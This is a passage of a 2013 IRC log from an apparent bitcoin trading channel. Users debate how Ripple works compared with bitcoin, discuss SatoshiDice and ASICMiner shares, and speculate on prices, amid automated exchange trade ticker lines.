05:53:20 BitHub i understand that part. the problem here is, bitcoin selling is different from most anything else. Feb 10 05:53:24 ok thanks Feb 10 05:53:26 whats their angle though? Feb 10 05:53:42 safer than fiat? Feb 10 05:53:44 i have to tell marketing people how to do their job? Feb 10 05:53:45 vampireb no, they pay for the whole 50mn (which obviously 37% whatever goes right back to erik) Feb 10 05:53:51 more profitable than wall street? Feb 10 05:53:54 BitHub you have to give them an angle. Feb 10 05:53:59 [MPEX] [S.MPOE] 4373 @ 0.000631 = 2.7594 BTC [-] Feb 10 05:53:59 [MPEX] [S.MPOE] 4800 @ 0.00063785 = 3.0617 BTC [+] Feb 10 05:54:05 [MPEX] [S.MPOE] 10477 @ 0.00064076 = 6.7132 BTC [+] Feb 10 05:54:20 their angle is, its a new thing called bitcoin, explaining it to people Feb 10 05:54:32 i thought there were 100 mil of shares, not 50 mil? Feb 10 05:54:36 but why does one want a bitcoin? Feb 10 05:54:40 erik sold only 10%, kept 90% Feb 10 05:54:55 vamp, correct sorta Feb 10 05:54:55 vampireb yes, 100mn shares, but owner may never sell more than half Feb 10 05:55:00 ic Feb 10 05:55:00 a whole wide range of reasons, do i really need to go in detail? Feb 10 05:55:17 only if you wanna continue the conversation Feb 10 05:55:20 idc Feb 10 05:55:25 i am just trying to figure out amount of divident per share Feb 10 05:55:27 BitHub the problem is this : the fixed cost to get someone into btc is huge Feb 10 05:55:32 how are they going to close the loop ? Feb 10 05:56:03 vampireb a 1mn block will likely get about 200 btc at current (20k) estimated profit for the month. Feb 10 05:56:06 ~3.5% / mo that not bad Feb 10 05:56:09 so i see riple is active, what exactly does it do again? how is it differnet from bitcoin other than using a premined coin? Feb 10 05:56:36 https://bitcointalk.org/index.php?topic=142150.0 Chaang-Noi Feb 10 05:56:55 my wife works in nonprofit sector, i was thinking that nonprofits should uptake bitcoin acceptance for donations Feb 10 05:57:00 goat did you get unbanned or something? Feb 10 05:57:03 just claim them as anonymous donations Feb 10 05:57:10 after converting to fiat Feb 10 05:57:23 or theymos supressed your avatar Feb 10 05:57:29 ThickAsThieves possibly. Feb 10 05:57:31 i was thinking to setup a service to collect donations for celebs and charaties and stuff, but might get in trouble Feb 10 05:57:42 even tho i would give them 100% of the bitcoin Feb 10 05:57:52 thanks MP Feb 10 05:58:02 like domestic violence shelters or dog shelters, etc Feb 10 05:58:04 vamp, i can now send PMs Feb 10 05:58:30 see i think you would hire a marketing team to sell the idea of bitcoin to merchants first Feb 10 05:58:48 i think that's what bitpay is doing atm Feb 10 05:59:28 it is. Feb 10 05:59:30 this is the most active I've seen the channel in awhile Feb 10 05:59:58 [MPEX] [S.MPOE] 4729 @ 0.00062002 = 2.9321 BTC [-] Feb 10 06:00:02 mircea, that link seems to show what is wrong with Ripple, my question is, why did they even bother to make ripple, what can it do that bitcoin cant? Feb 10 06:00:06 [BTCTC] [GSDPT] 500 @ 0.0062 = 3.1 BTC [+] Feb 10 06:00:29 Chaang-Noi i have not yet been able to glean that. Feb 10 06:00:42 as far as i can tell, it's all some dorks who wanna be developers cause they figure its cool. Feb 10 06:00:51 sorta like kids wanted to be rockstars in 1970 Feb 10 06:00:57 haha Feb 10 06:01:13 its made up of some very interesting characters, for sure. Feb 10 06:01:19 ripple seems like a step backwards :/ Feb 10 06:01:27 wth is ripple Feb 10 06:01:39 vampireb some bizzare shit, i haven't gotten it myself. Feb 10 06:01:45 www.ripple.com Feb 10 06:02:08 it is like a centralized bitcoin right? Feb 10 06:02:41 this seems silly... i expected google of facebook to do something like this but these clowns on their own? hmmm Feb 10 06:03:58 oh JoelKatz is involved with ripple, lol Feb 10 06:04:15 yeah, they've been all over how i hate them cause they r competitors and other nefarious reasons. Feb 10 06:04:21 [MPEX] [S.MPOE] 6673 @ 0.00064076 = 4.2758 BTC [+] Feb 10 06:04:23 [MPEX] [S.MPOE] 12900 @ 0.00064483 = 8.3183 BTC [+] Feb 10 06:04:25 fuck knows why people get so wrapped up in that nonsense. anyway. Feb 10 06:04:29 [MPEX] [S.MPOE] 16677 @ 0.00064505 = 10.7575 BTC [+] Feb 10 06:05:55 it seems you can create debt on ripple somehow... i wonder if this will end in tears Feb 10 06:06:26 So, shareholders fund the entire startup costs of the company and end up with 38% 'ownership.' It was exactly this point, what is ASICMiner's % of the company, that was debated in some detail when ASICMiner announced the IPO. Feb 10 06:06:35 meanwhile people ragging on asicminer hardcore. Feb 10 06:07:11 why, what happened with asicminer? Feb 10 06:07:15 hey Chaang-Noi Feb 10 06:07:15 for some reasons ripple was e-numbered lol Feb 10 06:07:20 i tought^^ Feb 10 06:07:48 38% ownership is pretty sad Feb 10 06:07:56 I can't understand how Ripple can take off… it requires that you establish establish credit relationships with your friends or associates. I'm too fucking lazy to do that. Feb 10 06:07:57 should be 50/50 at least Feb 10 06:07:58 BitHub well... it was the original offer iirc. Feb 10 06:08:26 maximian part of why im saying i dont get it is in the hopes someone goes "no you fucking idiot, it's like so and SO! see ?" Feb 10 06:08:26 did you buy any asicminer shares? Feb 10 06:08:29 so far no such luck. Feb 10 06:08:39 BitHub i shorted some long ago. i'd short some more but meh. Feb 10 06:08:45 they're not on an exchange, too much hassle. Feb 10 06:08:47 right Feb 10 06:08:58 Chaang-Noi: Hed, joelKats, and a few others Feb 10 06:09:07 wait. hed, what hed ? Feb 10 06:09:12 Jed Feb 10 06:09:14 you asshole :P Feb 10 06:09:17 Hi Ukto Feb 10 06:09:21 aok Feb 10 06:09:35 dude if you said hed hoelkatz i'd have totally gotten it. Feb 10 06:09:40 but no, you gotta be fancy and shit Feb 10 06:09:41 :P Feb 10 06:09:55 WeExchange is the first, and only ripple gateway at the moment Feb 10 06:10:17 I can confidently tell you, quite a bit of currency has already passed into ripple. Feb 10 06:10:22 so can i create ripple debt, sell it to weex cash bitcoins and arrivederci ? Feb 10 06:10:30 Doesnt work that way Feb 10 06:10:38 which way does it work ? Feb 10 06:10:38 since i inherently dont trust anyone, why would i trust a friend of a friend Feb 10 06:10:46 vampireb: you shouldnt Feb 10 06:10:47 vampireb because butt ? Feb 10 06:10:49 i woulnt trust 1k to my gf.. especially her friend Feb 10 06:10:50 thats what I am trying to say Feb 10 06:11:06 [MPEX] [S.MPOE] 17400 @ 0.00062877 = 10.9406 BTC [-] Feb 10 06:11:12 You dont WANT to trust a friend of a friend of a friend Feb 10 06:11:14 in fact Feb 10 06:11:17 you dont want to trust friends Feb 10 06:11:22 unless you are prepaid Feb 10 06:11:23 should i trust bitfloor with all my btc? Feb 10 06:11:28 expecially about money, dont trust friends... Feb 10 06:11:29 vampireb sounds to me like you need a new gf. Feb 10 06:11:30 BitHub: perhaps Feb 10 06:11:34 BitHub: all?! Feb 10 06:11:34 haha Feb 10 06:11:36 BitHub no. Feb 10 06:11:38 :P Feb 10 06:11:42 the real idea Feb 10 06:11:51 is that you pick your gateways as issuers Feb 10 06:11:52 and trust THEM Feb 10 06:11:55 for example Feb 10 06:12:05 I might only trust MPEX issued USD Feb 10 06:12:07 pretty much the only exchange i'd trust with btc/fiat atm is the bitcoin-central.net ppl Feb 10 06:12:13 and BitHub may only trust GOX issued USD Feb 10 06:12:18 well.. i got a new one :-) the old one still owes me shit load of money Feb 10 06:12:18 these are non-compatable Feb 10 06:12:20 Ukto how do you verify it's mpex issued ? Feb 10 06:12:30 but vampireb might trust both Feb 10 06:12:35 i was very cautious about using weex and bitfunder at first because i was really unsure about it, but so far its been good experience Feb 10 06:12:40 and have an 'offer' in the network to exchange them for a small fee Feb 10 06:12:44 vampireb have her pay back in blowjobs. let new gf get them Feb 10 06:12:57 MP you dont trust btc-e ? Feb 10 06:12:59 its almost impossible to collect ious from friends or family Feb 10 06:13:14 Chaang-Noi these guys specifically because they have the french bank insurance thing. Feb 10 06:13:28 mircea_popescu: your ripple wallet doesnt just account for totals by ISO name Feb 10 06:13:33 ahh Feb 10 06:13:34 they are just sum'd that way Feb 10 06:13:39 any other exchange, including mtgox, could just close tomorrow and well... enjoy liquidators Feb 10 06:13:47 in fact, you are holding issued notes signed by the issuer Feb 10 06:13:47 [MPEX] [S.MPOE] 19750 @ 0.00062002 = 12.2454 BTC [-] Feb 10 06:13:51 that have an ISO designation Feb 10 06:13:54 Ukto like gpg signed ? Feb 10 06:13:58 kinda Feb 10 06:14:00 but its not needed Feb 10 06:14:09 its all stored in the p2p ledger database Feb 10 06:14:16 Ukto are involved with ripple, also can you tell me why this system is differnt than btc? Feb 10 06:14:27 Chaang-Noi: I ahve been Feb 10 06:14:28 :P Feb 10 06:14:39 and I am not involved with it per say, I jsut run the only gate way Feb 10 06:14:41 sounds like a scammer heaven to me Feb 10 06:14:42 what is the over all pint of goal of ripple? Feb 10 06:14:47 point+ Feb 10 06:14:50 and making a desktop wallet program for it Feb 10 06:14:57 i guess easy conversion between currencies Feb 10 06:14:59 de-centralised backed fiat Feb 10 06:15:05 in my opinion Feb 10 06:15:14 but bitcoin does the same, i can convert to any fiat Feb 10 06:15:19 how is it decentralized if you have the only gateway? Feb 10 06:15:20 covert yes Feb 10 06:15:24 bit this is actual currency Feb 10 06:15:26 no conversion Feb 10 06:15:28 but Feb 10 06:15:30 if i go to russia, i just send BTC to qukppay machines Feb 10 06:15:33 I'd like to try it, but the Ripple wallet tells me I need ripples (XRP), and it's not clear how to get those. Feb 10 06:15:40 your misunderstanding Feb 10 06:15:48 Ripple is NOT ment to replace btc Feb 10 06:15:54 ripple is VERY btc friendly Feb 10 06:16:12 i do not understand what ripple does :/ Feb 10 06:16:23 how ripple covers exchange rate Feb 10 06:16:23 it allows you to store your fiats Feb 10 06:16:27 it lets you pay people or get paid Feb 10 06:16:31 lemme rephrase that Feb 10 06:16:32 fiat is such a sexy word Feb 10 06:16:34 it lets you store ANYTHING Feb 10 06:16:37 decentralised Feb 10 06:16:38 [HAVELOCK] [SDICE] 55 @ 0.719 = 39.545 BTC [+] Feb 10 06:16:52 hehe ripples Feb 10 06:16:55 BitHub: your thinking of overpriced cars again Feb 10 06:16:57 :P Feb 10 06:17:03 btc let me get paid or pay others Feb 10 06:17:16 think i will name my kid fiat Feb 10 06:17:20 yo fiiiiiiiiat Feb 10 06:17:23 ok so I got $20 in IOU from ripple, how do I convert to the actual $20 bill Feb 10 06:17:25 yes but only in btc, ripple lets you get paid in silver, hours, seashells, or euros Feb 10 06:17:37 [HAVELOCK] [SDICE] 33 @ 0.721 = 23.793 BTC [+] Feb 10 06:17:53 vampireb: you send it to someone who will accept it and give you a note Feb 10 06:17:55 and POOP Feb 10 06:17:58 you can pay ppl in POOP Feb 10 06:18:06 Ukto you're totally insane if you're dicking around with destops for ripple instead of plugging bf in here. Feb 10 06:18:08 >,> Feb 10 06:18:16 coders dude. give them a challenge, they'll be happy Feb 10 06:18:27 mircea_popescu: lol, nah, the desktop codes on the side burner Feb 10 06:18:47 :D Feb 10 06:18:48 so that someone may charge me interest... Hey you give me $20 in IOU, and I give $10 in physical bills... Feb 10 06:18:57 hmm Feb 10 06:19:05 stay focus Feb 10 06:19:15 pigeons how do i collect a seashell ? Feb 10 06:19:15 what is BF? Feb 10 06:19:22 vampireb: interest is in the spec, and the original ripplepay implementation, but not implemented yet in opencoin/payward ripple.com system Feb 10 06:19:24 https://bitfunder.com Feb 10 06:19:24 Chaang-Noi bitfunder.com Feb 10 06:19:28 you know of it Feb 10 06:19:30 you saw it long ago Feb 10 06:19:39 in alpha Feb 10 06:19:44 yeah, you just never told me the name:) Feb 10 06:19:47 so what's the difference... Feb 10 06:19:57 apples and oranges Feb 10 06:19:58 I sent 10BTC to a guy in NY, and I get $200 from him Feb 10 06:19:58 [MPEX] [S.DICE] 400 @ 0.00632265 = 2.5291 BTC [-] Feb 10 06:20:04 or I do the same in Russia Feb 10 06:20:07 same stuff. Feb 10 06:20:20 is BF working out well Ukto? i have not been folowing that stuff much lately. Feb 10 06:20:35 Chaang-Noi: user support says yes. :) Feb 10 06:20:37 it looked cool when you let me see it ages ago. Feb 10 06:20:56 it's all blue and shit. Feb 10 06:21:00 Its gotten 1,000x better since you last saw it Feb 10 06:21:07 oh cool Feb 10 06:21:10 mircea_popescu: I thoguth about putting a unicorn easter egg somewhere, just fo ryou Feb 10 06:21:13 lol Feb 10 06:21:22 a nice BLUE one Feb 10 06:21:23 :P Feb 10 06:21:32 ill have to check it out, i hope btc goes back down, i need to buy somre more... Feb 10 06:21:37 [HAVELOCK] [SDICE] 53 @ 0.721 = 38.213 BTC [+] Feb 10 06:21:48 Chaang-Noi: not for at least 3~5 weeks Feb 10 06:22:04 we will see $30 within 30~45 days Feb 10 06:22:07 update the news section Ukto :P give me a lil present to read :) Feb 10 06:22:11 Ukto we might see 100 Feb 10 06:22:21 i see 100's all the time Feb 10 06:22:21 :P Feb 10 06:22:52 ukto i think you might be right, no one is selling! once it hits 30ish you see it crashing a bit? Feb 10 06:23:01 "Please stop being a jerk, EskimoBob." evoorhees is so cute i swear Feb 10 06:23:07 depends on the news burst that goes with it Feb 10 06:23:18 right now a lot of " Feb 10 06:23:20 i imagine the reason eskimoblob is a jerk is because nobody asked him to stop befoar. Feb 10 06:23:23 normals" are investing into btc Feb 10 06:23:36 when it hits 30, if there is not a huge news buzz of crazyness Feb 10 06:23:46 it will slump back to $25 Feb 10 06:23:49 or $22 Feb 10 06:23:49 Ukto i won't sell, for instance. i don;t care what it is tbh. Feb 10 06:23:57 same Feb 10 06:23:58 I dont trade Feb 10 06:24:02 I use btc for btc Feb 10 06:24:03 it all depends how many people hold how much btc this way Feb 10 06:24:05 hmm... anyone want gold or silver for btc? :) Feb 10 06:24:14 bitcoin shouldnt be 22.. now... now like i complain.. Feb 10 06:24:20 not* Feb 10 06:24:23 vampireb why not ? Feb 10 06:24:27 but.. when it hits $30, if there IS a big news deal, and it goes further viral Feb 10 06:24:36 you can expect a major price jump to $35~$40 very quickly Feb 10 06:24:36 where chaang? Feb 10 06:24:48 jesus ukto Feb 10 06:24:51 the gold and silver is in the usa Feb 10 06:24:53 i dont know, it rose too quickly. i prefer stable rates.. then the rate that change every day by like 10% Feb 10 06:25:06 I have been contacted by a number of 'normal' investors Feb 10 06:25:12 seeking help with using btc, and other things Feb 10 06:25:13 i cant type. :/ Feb 10 06:25:17 through various channels Feb 10 06:25:36 do they have ballz deep pockets? Feb 10 06:25:39 bitcoin is becoming a buzz Feb 10 06:25:41 vampireb i see your point re stable rates. Feb 10 06:25:50 however, there's a great advantage to mlt cap over 1bn Feb 10 06:25:58 and since by now stability is fucked anyway Feb 10 06:26:01 might as well get the bn Feb 10 06:26:07 We had stability. Feb 10 06:26:10 if i sell something that i bought for USD.. i dont need to recalc the price 10x time a day.. I wouldnt do that for EUR Feb 10 06:26:14 It drove in a new demand Feb 10 06:26:19 now its going nuts due to the huge demand Feb 10 06:26:30 All exchanges are currently getting a flood of incoming cash Feb 10 06:26:35 best to buy up while its 25 Feb 10 06:26:36 i sold just a PI for 3BTC, that's over $70 now Feb 10 06:26:37 This is fact, not fiction Feb 10 06:26:48 Ukto i know. Feb 10 06:27:01 rasberry pi Feb 10 06:27:11 hard to set prices which such swings Feb 10 06:27:39 In fact, after some dsicussions, I venture to say that the last 30 days, has been the largest influx of new cash into exchanges in such a short period ever for bitcoin Feb 10 06:28:04 yeah, i can see that Feb 10 06:28:13 Duh Feb 10 06:28:15 it has been doing really well this year so far Feb 10 06:28:22 We are riding on a tsunami atm, thats jsut getting bigger until it crashes into something. but in the end, it will still leave higher water levels than the start. Feb 10 06:28:43 I am going to have a lot of Feb 10 06:28:49 well people know more and more about bitcoin.. few of my coworkers knew about.. that suprised me a lot Feb 10 06:28:51 Coins after the crash Feb 10 06:29:17 Bugpowder eheheeh Feb 10 06:29:19 coingenuity ran into a bartender girl at a bar randomly, who knew of them Feb 10 06:29:35 I coudl have written that better. oh well Feb 10 06:29:41 [MPEX] [S.MPOE] 13100 @ 0.00062002 = 8.1223 BTC [-] Feb 10 06:29:41 is it that becuase of silkroad ? :_) Feb 10 06:29:42 Ukto: was a coffee-girl, but yeah Feb 10 06:29:47 fine Feb 10 06:29:49 COFFEE Feb 10 06:29:55 heh, point still stands Feb 10 06:29:59 coingenuity i was thinking oh, the man drinks ? Feb 10 06:30:00 Fuckin take all of mpbor in well Feb 10 06:30:00 like a coffeehouse in amsterdam? Feb 10 06:30:03 Timed puts Feb 10 06:30:04 not an ugly girl, as well Feb 10 06:30:08 only Nyquil Feb 10 06:30:12 :P Feb 10 06:30:27 Ukto: speaks the truth, im not a substance-liker Feb 10 06:31:05 btw Feb 10 06:31:12 to that end, when i was at defcon, i had a standing bet Feb 10 06:31:22 that the vast majority of strangers i asked would know what bitcoin was Feb 10 06:31:30 to make it interesting, i basically only asked women if i could Feb 10 06:31:40 did you win ? Feb 10 06:31:43 and only 1 out of ALL the genders i asked didn't know what bitcoin was Feb 10 06:31:50 around 10 people, mostly women Feb 10 06:31:52 cool. Feb 10 06:32:06 they were my hos Feb 10 06:32:12 haha Feb 10 06:32:13 pigeons: lol Feb 10 06:32:18 also, the CEO of the ripple foundation is Chris Larsen, former chaiman, CEO and co-founder of prosper.com Feb 10 06:32:32 He has made a lot of big connections for Ripple Feb 10 06:33:16 amazon coin has a lot of big connections too. Feb 10 06:33:23 i still don't know why i'd use it. why'd i use it ? Feb 10 06:33:32 my bitcoind has 8 connections. Feb 10 06:34:09 [MPEX] [S.MPOE] 10750 @ 0.00062002 = 6.6652 BTC [-] Feb 10 06:35:08 mircea_popescu: *shrug* thats for you to figure out. Feb 10 06:35:09 :) Feb 10 06:35:11 mircea_popescu: amazon coin cracks me up Feb 10 06:35:12 I am jsut a gateway Feb 10 06:35:17 ask the ripple guys in #ripple Feb 10 06:35:25 coingenuity such a fine example of design by commitee Feb 10 06:35:30 lots of people wanted to cash into it Feb 10 06:35:31 I said okay Feb 10 06:35:33 and filled a gap Feb 10 06:35:35 end of story Feb 10 06:35:36 :P Feb 10 06:35:45 Ukto not like it's a crime. im just questing for knowledge Feb 10 06:35:59 honestly, I think they want it to replace payment services Feb 10 06:36:20 without a blockchain ? Feb 10 06:36:24 yes Feb 10 06:36:27 it has a blockchain Feb 10 06:36:29 hurr. Feb 10 06:36:30 wait, what ? Feb 10 06:36:32 no blockchain Feb 10 06:36:32 i dont think ripple is much more different than a bitcoin, and that's just fragmenting the market.. Feb 10 06:36:38 near instant transfers Feb 10 06:36:39 they have a ledger Feb 10 06:36:43 yes Feb 10 06:36:45 dude they can't even agree if it has a chain ;/ Feb 10 06:36:54 i've had enough of this for now, my brain is rippling. Feb 10 06:37:18 i agree, the website is so confusing. Feb 10 06:37:22 very confusing Feb 10 06:37:24 I agree Feb 10 06:37:28 I have told them to change it Feb 10 06:37:33 mircea_popescu: lol Feb 10 06:37:56 Since I have the server source, etc, I have a very deep understanding of exactly how it works Feb 10 06:38:10 you don't have the source ? Feb 10 06:38:17 did you code your server to api spec or what Feb 10 06:38:21 [22:38] Since I have the server source Feb 10 06:38:27 a a sorry. Feb 10 06:38:31 :) Feb 10 06:38:36 Its not public atm Feb 10 06:38:43 and very few people 'understand' it Feb 10 06:38:48 ok so. it does payments. how does it resolve the dblspend problem ? blockchain ? Feb 10 06:39:02 no blockchain Feb 10 06:39:05 ituses ledgers Feb 10 06:39:05 https://ripple.com/wiki/Ledger_Format Feb 10 06:39:06 but ? Feb 10 06:39:10 and concensus Feb 10 06:39:18 hash table ledger, similar idea Feb 10 06:39:25 except your not chaining anything Feb 10 06:39:36 and theres no mining Feb 10 06:39:50 so if you don't chain them how do you get a history ? Feb 10 06:39:51 so it uses consensus instead of proof-of-work to secure the ledger Feb 10 06:39:58 you do chain them Feb 10 06:40:00 maximian: correct Feb 10 06:40:12 pigeons: to some extent Feb 10 06:40:16 however its not the same style Feb 10 06:40:22 for example right now Feb 10 06:40:25 thre are at least 3 missing ledgers Feb 10 06:40:32 a chain cannot have a missing link Feb 10 06:40:45 Flags Feb 10 06:40:45 Every node has a 32-bit flags field that indicates which universal and node-type-specific flags are present. Feb 10 06:40:49 ok, who specced this thing ? Feb 10 06:40:55 was not me Feb 10 06:40:59 yeah well we'll see how this specific implementation of ripple evolves Feb 10 06:40:59 its weird Feb 10 06:41:03 also Feb 10 06:41:07 so noboduy admits to having specced it i take it ? Feb 10 06:41:08 there is division use Feb 10 06:41:11 and that annoyed the crap out of me Feb 10 06:42:06 [MPEX] [S.MPOE] 3700 @ 0.00062067 = 2.2965 BTC [+] Feb 10 06:42:15 To store a large directory of indexes, the entries are divided into nodes of a manageable size. Each node knows the relative offset of the previous and next nodes. Empty nodes can be deleted. However, the first node can not be deleted unless there are no other nodes as we use the first node to efficiently find other nodes. Feb 10 06:42:23 ok this is nonsense. Feb 10 06:42:26 So is the consensus method proven to be equally secure as proof-of-work, or does it not have to be? Feb 10 06:42:33 if you delete an empty node don't you get a dangling pointer ? Feb 10 06:42:45 maximian it's not nearly as secure fwiw. Feb 10 06:42:49 maximian: neither is proven Feb 10 06:43:20 srsly ? 4 years into it, still not proven ? Feb 10 06:43:26 I suppose I don't mean proven in the mathematical sense. Feb 10 06:43:33 proof of work + supsidy has worked well for a few years so far yes Feb 10 06:43:49 anywho Feb 10 06:43:51 i wouldnt say proven, and it remains to be seen if proof of work will hold when subsidy is gone Feb 10 06:43:52 I am gonna try to code Feb 10 06:43:54 so I can get this done Feb 10 06:44:15 pigeons what happens to the consensus method if there's a net split for 24 hours which then resolves ? Feb 10 06:44:22 ah Feb 10 06:44:25 that was one of my peevs Feb 10 06:44:31 there is an islanding thing Feb 10 06:44:38 i would think there would be yes. Feb 10 06:44:45 i am not familair with consensus or this ripple implementation. i am just saying proof of work is far from proven Feb 10 06:44:47 as for the plans on that Feb 10 06:44:54 that we agree with. Feb 10 06:44:59 there is a minority detection thing Feb 10 06:45:01 they have Feb 10 06:45:01 im just a fanboi. Feb 10 06:46:13 ok. so they have a current ledger, when the system decides to create a new ledger? after xx seconds? xx transactions? Feb 10 06:46:19 My understanding is that the proof-of-work method of synchronizing nodes is a real breakthrough in distributed computing, and I'm wondering how consensus stacks up against that. Feb 10 06:47:03 maximian same here. Feb 10 06:47:06 its is less expensive and probable less "secure" but we don't know, that's why we use these things Feb 10 06:47:28 i wonder why it being less expensive is a good thing. Feb 10 06:48:01 isn't a good chunk of btc security derived precisely from the fact that its' so damned expensive to attack ? Feb 10 06:48:08 yes Feb 10 06:48:36 in some contexts i see less expensive and my brain reads cheap. Feb 10 06:48:45 some of that was borrowed with ripple.com with their XRP transaction fees Feb 10 06:49:03 i thought that was more akin some sort of demurage implementation Feb 10 06:49:12 well there are many different goals and people are willing or able to pay differnt prices for the, Feb 10 06:49:45 mircea_popescu: it is intended to add expense. they sort of demmurge in the fact that they are permanently destroyed, increasing the value and expense Feb 10 06:50:36 well, i guess we see what time brings to it. Feb 10 06:50:48 it is quite beta for sure Feb 10 06:51:11 I've got an open mind about it, and I'd like to try it, buy I can't get any of these XRPs to transact with Feb 10 06:51:23 give me your address and i'll give you some Feb 10 06:51:38 maximian do you have a client and everything ? Feb 10 06:51:47 pigeons: thanks, hold on Feb 10 06:51:58 mircea_popescu: I just setup a wallet at ripple.com Feb 10 06:52:10 it's web-based Feb 10 06:52:27 pigeons: r3B5eqGFAHKTD74sXajnMhmb41FmBtb3Sa Feb 10 06:52:31 Loading... Feb 10 06:52:38 i guess it needs js or java or something ? Feb 10 06:52:44 yep Feb 10 06:52:46 js for sure Feb 10 06:52:48 its a javascript browser plugin that uses websockets to connect to theri server Feb 10 06:52:51 javascript Feb 10 06:52:58 what happens all the money in ripple if say the govt shuts down ripple.com or redirects it to some other site? Feb 10 06:53:15 you ideally run the client locally Feb 10 06:53:27 oh, i did not know that could be done Feb 10 06:53:48 right now it is obviously centralised and vulnerable in those ways Feb 10 06:54:37 i do not unerstand how they got around the double spend issue unless either it is centralized, or they have a block chain Feb 10 06:54:42 awesome Feb 10 06:54:45 thanks pigeons Feb 10 06:54:51 you got them? Feb 10 06:54:59 yep, got a green alert Feb 10 06:55:00 https://ripple.com/wp-content/themes/ripple-theme/img/logo.png Feb 10 06:55:03 300 XRP Feb 10 06:55:08 anybody ever succesfull able to show their localbitcoins.com add on their own website? Feb 10 06:57:15 pigeons: I received your trust 0.25 BTC event, how do I reciprocate? Feb 10 06:59:02 currently Feb 10 06:59:06 the ONLY client Feb 10 06:59:11 is the ripple.com JS Feb 10 06:59:19 which is why I started making my client last month Feb 10 06:59:28 once I get done with my current project Feb 10 06:59:32 and do a couple quick small things Feb 10 06:59:38 I will get it ready for alpha release Feb 10 06:59:45 using JS and i can get hacked? Feb 10 07:00:10 i use no script, i guess that is why it is not working for me. Feb 10 07:01:36 I poked someone in ripple to talk in #ripple Feb 10 07:01:41 if you wanna go hound them with questions Feb 10 07:01:41 ;) Feb 10 07:03:24 [MPEX] [S.DICE] 278 @ 0.00632265 = 1.7577 BTC [-] Feb 10 07:03:25 [MPEX] [S.DICE] 222 @ 0.0063 = 1.3986 BTC [-] Feb 10 07:05:20 i asked a question, thanks ukto **** BEGIN LOGGING AT Sun Feb 10 12:06:00 2013 Feb 10 12:06:58 ;;ticker Feb 10 12:06:59 BTCUSD ticker | Best bid: 23.49002, Best ask: 23.50998, Bid-ask spread: 0.01996, Last trade: 23.51000, 24 hour volume: 49657.03583015, 24 hour low: 22.58468, 24 hour high: 23.98961, 24 hour vwap: 23.39455 Feb 10 12:08:18 [MPEX] [S.MPOE] 6559 @ 0.00062664 = 4.1101 BTC [-] Feb 10 12:08:20 [MPEX] [S.MPOE] 1041 @ 0.00062473 = 0.6503 BTC [-] Feb 10 12:12:37 [MPEX] [S.MPOE] 7957 @ 0.00062667 = 4.9864 BTC [+] Feb 10 12:22:32 [MPEX] [S.MPOE] 2659 @ 0.00062473 = 1.6612 BTC [-] Feb 10 12:22:34 [MPEX] [S.MPOE] 2608 @ 0.00062032 = 1.6178 BTC [-] Feb 10 12:22:37 [MPEX] [S.MPOE] 8533 @ 0.0006203 = 5.293 BTC [-] Feb 10 12:27:42 http://www.wired.com/threatlevel/2013/02/electronics-border-seizures/ Feb 10 12:27:51 shit's pretty funny. if you buy an ipad it's not your ipad Feb 10 12:27:53 sez obama. Feb 10 12:30:04 [MPEX] [S.MPOE] 12699 @ 0.00062667 = 7.9581 BTC [+] Feb 10 12:43:43 [MPEX] [S.MPOE] 21384 @ 0.00063407 = 13.559 BTC [+] Feb 10 12:43:45 [MPEX] [S.MPOE] 13900 @ 0.00062699 = 8.7152 BTC [-] Feb 10 12:43:50 [MPEX] [S.MPOE] 20967 @ 0.0006203 = 13.0058 BTC [-] Feb 10 12:43:51 [MPEX] [S.MPOE] 5904 @ 0.00062003 = 3.6607 BTC [-] Feb 10 12:43:56 [MPEX] [S.MPOE] 14145 @ 0.00062002 = 8.7702 BTC [-] Feb 10 12:49:09 One of many reasons why evorhees should move out of the US asap Feb 10 12:49:16 [MPEX] [S.MPOE] 11700 @ 0.00062002 = 7.2542 BTC [-] Feb 10 12:49:58 i think he prolly will. Feb 10 12:51:40 already done before the IPO if he was smart Feb 10 12:51:49 That's my main worry if it comes to s.dice, think a Kim Dotcomesque scenario Feb 10 12:52:06 no way Feb 10 12:52:24 yah wai Feb 10 12:52:25 all the players need it's the 12 addres Feb 10 12:52:59 Doesn't it need maintenance? Feb 10 12:53:07 ok explain for me please how the fed or other can take down S.dice Feb 10 12:53:20 one main page in irlande Feb 10 12:53:32 the script somewhere in the world Feb 10 12:53:44 with 5 backup Feb 10 12:53:46 Schadenfreude it needs some maintenance, obviously, but i don't think erik is involved in that himself Feb 10 12:54:03 error4733 yes it's very censorship resistant. Feb 10 12:54:29 it got to ipo on mpex cause it's about as strong as mpex after all. Feb 10 12:54:31 Well, obviously I was more worried as shareholder - no dividends, price tanking etc. Feb 10 12:54:47 i'm in the same boat Feb 10 12:55:04 but i think for all those detail before bought my share Feb 10 12:55:05 and some govt going bonkers is a legitimate concern Feb 10 12:55:20 but still i guess the damage could be well limited. Feb 10 12:56:47 even if eric hold all the 90%, just no way to prove it Feb 10 12:56:58 88% sorry Feb 10 12:59:18 [BTCTC] [S.MPOE-PT] 1 @ 0.0007 BTC Feb 10 12:59:23 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Feb 10 12:59:52 [MPEX] [S.MPOE] 2500 @ 0.00062002 = 1.5501 BTC [-] Feb 10 13:05:05 prove what you mean ? Feb 10 13:05:56 if fed knok the eric door Feb 10 13:06:19 [MPEX] [S.MPOE] 11050 @ 0.00062002 = 6.8512 BTC [-] Feb 10 13:06:25 Knock* Feb 10 13:07:06 well, the only way to prove it is if i say so, or else if they find a cleartext stat. Feb 10 13:12:23 [MPEX] [S.MPOE] 4900 @ 0.00062074 = 3.0416 BTC [+] Feb 10 13:13:09 [BTCTC] [GSDPT] 8 @ 0.0062 = 0.0496 BTC [+] Feb 10 13:14:50 [MPEX] [S.MPOE] 17200 @ 0.00062013 = 10.6662 BTC [-] Feb 10 13:14:52 [MPEX] [S.MPOE] 1700 @ 0.00062002 = 1.054 BTC [-] Feb 10 13:17:32 [MPEX] [S.MPOE] 16072 @ 0.00062002 = 9.965 BTC [-] Feb 10 13:22:14 [MPEX] [S.MPOE] 39900 @ 0.00062002 = 24.7388 BTC [-] Feb 10 13:25:16 http://www.google.com/search?q=mpex&complete=0 Feb 10 13:25:22 ahh, finally ahead of the wiki Feb 10 13:33:24 [MPEX] [X.IDIFF.MAR] 40 @ 0.0429 = 1.716 BTC [-] Feb 10 13:39:02 [MPEX] [S.DICE] 6 @ 0.00606903 = 0.0364 BTC [-] Feb 10 13:40:43 [MPEX] [S.MPOE] 6436 @ 0.00062074 = 3.9951 BTC [+] Feb 10 13:41:48 [MPEX] [S.MPOE] 3312 @ 0.00062314 = 2.0638 BTC [+] Feb 10 